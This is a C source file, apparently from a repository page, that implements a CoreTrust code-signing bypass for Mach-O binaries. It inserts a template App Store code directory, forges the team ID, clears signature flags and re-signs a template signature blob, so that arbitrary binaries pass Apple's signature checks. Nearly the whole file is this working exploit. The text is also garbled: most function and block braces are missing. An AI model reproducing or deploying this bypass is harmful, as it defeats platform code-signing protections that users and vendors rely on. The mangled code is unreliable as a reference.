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synced 2025-03-15 10:06:37 +08:00
249 lines
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249 lines
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#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <dirent.h>
#include <sys/stat.h>
#include <choma/CSBlob.h>
#include <choma/MachOByteOrder.h>
#include <choma/MachO.h>
#include <choma/Host.h>
#include <choma/MemoryStream.h>
#include <choma/FileStream.h>
#include <choma/BufferedStream.h>
#include <choma/Signing.h>
#include <choma/SignOSSL.h>
#include <choma/CodeDirectory.h>
#include <choma/Base64.h>
#include "Templates/AppStoreCodeDirectory.h"
#include "Templates/SignatureBlob.h"
#include "Templates/DecryptedSignature.h"
// We can use static offsets here because we use a template signature blob
#define SIGNED_ATTRS_OFFSET 0x12DE // SignedAttributes sequence
#define HASHHASH_OFFSET 0x1388 // SHA256 hash SignedAttribute
#define BASEBASE_OFFSET 0x14C5 // Base64 hash SignedAttribute
#define SIGNSIGN_OFFSET 0x151A // Signature
int update_signature_blob(CS_DecodedSuperBlob *superblob)
CS_DecodedBlob *sha256CD = csd_superblob_find_blob(superblob, CSSLOT_ALTERNATE_CODEDIRECTORIES, NULL);
if (!sha256CD) {
printf("Could not find CodeDirectory blob!\n");
return -1;
CS_DecodedBlob *signatureBlob = csd_superblob_find_blob(superblob, CSSLOT_SIGNATURESLOT, NULL);
if (!signatureBlob) {
printf("Could not find signature blob!\n");
return -1;
uint8_t fullHash[CC_SHA256_DIGEST_LENGTH];
size_t dataSizeToRead = csd_blob_get_size(sha256CD);
uint8_t *data = malloc(dataSizeToRead);
memset(data, 0, dataSizeToRead);
csd_blob_read(sha256CD, 0, dataSizeToRead, data);
CC_SHA256(data, (CC_LONG)dataSizeToRead, fullHash);
uint8_t secondCDSHA256Hash[CC_SHA256_DIGEST_LENGTH];
memcpy(secondCDSHA256Hash, fullHash, CC_SHA256_DIGEST_LENGTH);
// Print the hash
printf("SHA256 hash: ");
for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++) {
printf("%02x", secondCDSHA256Hash[i]);
size_t base64OutLength = 0;
char *newBase64Hash = base64_encode(secondCDSHA256Hash, CC_SHA1_DIGEST_LENGTH, &base64OutLength);
if (!newBase64Hash) {
printf("Failed to base64 encode hash!\n");
return -1;
// Print the base64 hash
printf("Base64 hash: %.*s\n", CC_SHA256_DIGEST_LENGTH, newBase64Hash);
int ret = csd_blob_write(signatureBlob, HASHHASH_OFFSET, CC_SHA256_DIGEST_LENGTH, secondCDSHA256Hash);
if (ret != 0) {
printf("Failed to write SHA256 hash to signature blob!\n");
return -1;
ret = csd_blob_write(signatureBlob, BASEBASE_OFFSET, base64OutLength, newBase64Hash);
if (ret != 0) {
printf("Failed to write base64 hash to signature blob!\n");
return -1;
unsigned char *newSignature = NULL;
size_t newSignatureSize = 0;
unsigned char newDecryptedSignature[0x33];
memset(newDecryptedSignature, 0, 0x33);
memcpy(newDecryptedSignature, DecryptedSignature, 0x33);
// Get the signed attributes hash
unsigned char signedAttrs[0x229];
memset(signedAttrs, 0, 0x229);
csd_blob_read(signatureBlob, SIGNED_ATTRS_OFFSET, 0x229, signedAttrs);
signedAttrs[0] = 0x31;
// Hash
uint8_t fullAttributesHash[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(signedAttrs, (CC_LONG)0x229, fullAttributesHash);
memcpy(newDecryptedSignature + DECRYPTED_SIGNATURE_HASH_OFFSET, fullAttributesHash, CC_SHA256_DIGEST_LENGTH);
newSignature = signWithRSA(newDecryptedSignature, DecryptedSignature_len, &newSignatureSize);
if (!newSignature) {
printf("Failed to sign the decrypted signature!\n");
return -1;
if (newSignatureSize != 0x100) {
printf("The new signature is not the correct size!\n");
return -1;
ret = csd_blob_write(signatureBlob, SIGNSIGN_OFFSET, newSignatureSize, newSignature);
return ret;
int apply_coretrust_bypass(const char *machoPath)
MachO *macho = macho_init_for_writing(machoPath);
if (!macho) return -1;
CS_SuperBlob *superblob = macho_read_code_signature(macho);
if (!superblob) {
printf("Error: no code signature found, please fake-sign the binary at minimum before running the bypass.\n");
return -1;
CS_DecodedSuperBlob *decodedSuperblob = csd_superblob_decode(superblob);
uint64_t originalCodeSignatureSize = BIG_TO_HOST(superblob->length);
CS_DecodedBlob *realCodeDirBlob = NULL;
CS_DecodedBlob *mainCodeDirBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_CODEDIRECTORY, NULL);
CS_DecodedBlob *alternateCodeDirBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_ALTERNATE_CODEDIRECTORIES, NULL);
if (!mainCodeDirBlob) {
printf("Error: Unable to find code directory, make sure the input binary is ad-hoc signed?\n");
return -1;
// We need to determine which code directory to transfer to the new binary
if (alternateCodeDirBlob) {
// If an alternate code directory exists, use that and remove the main one from the superblob
realCodeDirBlob = alternateCodeDirBlob;
csd_superblob_remove_blob(decodedSuperblob, mainCodeDirBlob);
else {
// Otherwise use the main code directory
realCodeDirBlob = mainCodeDirBlob;
CS_CodeDirectory *realCD = malloc(sizeof(CS_CodeDirectory));
csd_blob_read(realCodeDirBlob, 0, sizeof(CS_CodeDirectory), realCD);
if (realCD->hashType != CS_HASHTYPE_SHA256_256) {
printf("Error: Alternate code directory is not SHA256, bypass won't work!\n");
return -1;
printf("Applying App Store code directory...\n");
// Append real code directory as alternateCodeDirectory at the end of superblob
csd_superblob_remove_blob(decodedSuperblob, realCodeDirBlob);
csd_blob_set_type(realCodeDirBlob, CSSLOT_ALTERNATE_CODEDIRECTORIES);
csd_superblob_append_blob(decodedSuperblob, realCodeDirBlob);
// Insert AppStore code directory as main code directory at the start
CS_DecodedBlob *appStoreCodeDirectoryBlob = csd_blob_init(CSSLOT_CODEDIRECTORY, (CS_GenericBlob *)AppStoreCodeDirectory);
csd_superblob_insert_blob_at_index(decodedSuperblob, appStoreCodeDirectoryBlob, 0);
printf("Adding new signature blob...\n");
CS_DecodedBlob *signatureBlob = csd_superblob_find_blob(decodedSuperblob, CSSLOT_SIGNATURESLOT, NULL);
if (signatureBlob) {
// Remove existing signatureBlob if existant
csd_superblob_remove_blob(decodedSuperblob, signatureBlob);
// Append new template blob
signatureBlob = csd_blob_init(CSSLOT_SIGNATURESLOT, (CS_GenericBlob *)TemplateSignatureBlob);
csd_superblob_append_blob(decodedSuperblob, signatureBlob);
// After Modification:
// 1. App Store CodeDirectory (SHA1)
// ?. Requirements
// ?. Entitlements
// ?. DER entitlements
// 5. Actual CodeDirectory (SHA256)
// 6. Signature blob
printf("Updating TeamID...\n");
// Get team ID from AppStore code directory
// For the bypass to work, both code directories need to have the same team ID
char *appStoreTeamID = csd_code_directory_copy_team_id(appStoreCodeDirectoryBlob, NULL);
if (!appStoreTeamID) {
printf("Error: Unable to determine AppStore Team ID\n");
return -1;
// Set the team ID of the real code directory to the AppStore one
if (csd_code_directory_set_team_id(realCodeDirBlob, appStoreTeamID) != 0) {
printf("Error: Failed to set Team ID\n");
return -1;
printf("TeamID set to %s!\n", appStoreTeamID);
// Set flags to 0 to remove any problematic flags (such as the 'adhoc' flag in bit 2)
csd_code_directory_set_flags(realCodeDirBlob, 0);
printf("Encoding unsigned superblob...\n");
CS_SuperBlob *encodedSuperblobUnsigned = csd_superblob_encode(decodedSuperblob);
printf("Updating load commands...\n");
if (update_load_commands_for_coretrust_bypass(macho, encodedSuperblobUnsigned, originalCodeSignatureSize, memory_stream_get_size(macho->stream)) != 0) {
printf("Error: failed to update load commands!\n");
return -1;
printf("Updating code slot hashes...\n");
csd_code_directory_update(realCodeDirBlob, macho);
int ret = 0;
printf("Signing binary...\n");
ret = update_signature_blob(decodedSuperblob);
if(ret == -1) {
printf("Error: failed to create new signature blob!\n");
return -1;
printf("Encoding signed superblob...\n");
CS_SuperBlob *newSuperblob = csd_superblob_encode(decodedSuperblob);
printf("Writing superblob to MachO...\n");
// Write the new signed superblob to the MachO
macho_replace_code_signature(macho, newSuperblob);
return 0;
} |